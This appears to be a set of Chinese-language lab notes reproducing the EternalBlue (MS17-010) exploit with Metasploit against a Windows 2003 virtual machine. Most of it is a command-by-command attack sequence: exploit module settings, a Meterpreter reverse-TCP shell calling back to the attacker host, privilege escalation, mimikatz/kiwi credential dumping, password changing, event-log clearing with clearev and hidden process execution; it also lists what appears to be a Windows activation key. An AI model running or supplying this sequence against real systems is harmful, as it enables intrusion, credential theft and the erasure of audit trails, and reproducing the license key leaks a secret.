Ox00 前言
- Kali:192.168.88.133
- Win2003:192.168.88.137
- 原版链接 激活码:MDGJK-PF6YQ-PD8DJ-RFQVM-7WKWG
Ox01 msfconsol工具
- sudo msfconsol
- search ms17_010
1:扫描ms17_010 2:Win7x64利用 4:通用利用
Ox02 扫描
- 打开模块
- use 1 或 exploit/windows/smb/ms17_010_psexec
- 设置靶机的 IP 和端口
- set RHOSTS 192.168.88.137
- set RPORT 445 【默认端口】
- run
- END
Ox03 攻击
- 打开模块
- use 4 或 exploit/windows/smb/ms17_010_psexec
- 查看需要设置的信息
- show options
- 设置靶机的 IP 和端口
- set RHOSTS 192.168.88.137
- set RPORT 445 【默认端口】
- 设置攻击使用的 payload
- set payload windows/meterpreter/reverse_tcp
- set lhost 192.168.88.133 或 set lhost
- set lport 4444 【默认端口】
- 进行攻击
- exploit
- 得到 meterpreter
Ox04 利用
- 参考链接
- 查看权限
- getuid 如果需要提权则 getsystem

- 使用mimikatz(现kiwi)
- load mimikatz 或 load wiki

- 列出所有帐户列表
- creds_all

- 修改密码命令
- password_change

- 清除事件日志
- clearev

- 额外内容
- 先查看目标主机安装了哪些应用
- run post/windows/gather/enum_applications

- 先查看目标主机有哪些用户
- END
Ox05 SHELL
- 命令shell可进入目标系统的shell,Window为CMD
- kiwi可使用execute创建进程
-f:指定可执行文件 -H:创建一个隐藏进程 -a:传递给命令的参数 -i: 跟进程进行交互 -m:从内存中执行 -t: 使用当前伪造的线程令牌运行进程 -s: 在给定会话中执行进程
-
execute -i -f cmd
-
乱码问题
- Linux默认为UTF-8编码,中文Windows默认为GBK/GB2312
- 所以该通道流在显示时会发生编码问题
- 通过修改CMD编码流
- chcp 65001
- 通过修改SSH编码流
-
查询权限
-
查询系统信息及补丁
-
END
OxFF 后记
参考链接
【漏洞复现】永恒之蓝 ms17-010 漏洞利用 攻击手法 - Bay0net - 博客园 https://www.cnblogs.com/v1vvwv/p/ms17-010-exploit.html Metasploit-进阶用户密码与mimikatz模块kiwi模块_CSDN-wpsec-CSDN博客 https://blog.csdn.net/qq_38626043/article/details/109388147 Metasploit Framework(MSF)的使用 - 墨鱼菜鸡 - 博客园 https://www.cnblogs.com/csnd/p/11807588.html windows CMD实现的信息收集工具 - 墨鱼菜鸡 - 博客园 https://www.cnblogs.com/csnd/p/12580924.html
1:扫描ms17_010
2:Win7x64利用
4:通用利用







